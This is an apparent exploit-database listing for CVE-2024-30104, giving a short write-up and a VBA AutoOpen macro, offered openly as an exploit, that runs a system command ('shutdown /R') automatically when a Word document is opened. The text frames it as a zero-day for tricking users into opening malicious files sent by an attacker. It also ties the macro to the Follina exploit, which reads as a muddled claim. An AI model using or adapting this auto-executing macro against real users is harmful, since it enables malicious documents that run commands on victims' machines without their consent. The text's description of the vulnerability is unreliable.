Share
## https://sploitus.com/exploit?id=PACKETSTORM:179394
### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)  
  
The problem is still in the "docx" files this vulnerability is a 0 day  
based on the Follina exploit. The Microsoft company still doesn't want  
to understand, that they MUST remove macros options from the 365  
Office and their offline app. In this video, you will see an example  
of this, how some users can be trickery to open the malicious file  
that is sent to them by the attacker. After execution of the file, the  
thing will be very bad for the users who execute it on their computer.  
It depends of the scenario.  
  
### The exploit:  
```vbs  
Sub AutoOpen()  
Dim Program As String  
Dim TaskID As Double  
On Error Resume Next  
Program = "shutdown /R"  
TaskID = Shell(Program, 1)  
If Err <> 0 Then  
MsgBox "Can't start " & Program  
End If  
End Sub  
```  
- Enjoy watching  
  
### PoC:  
[video](https://www.patreon.com/posts/cve-2024-30104-107163015)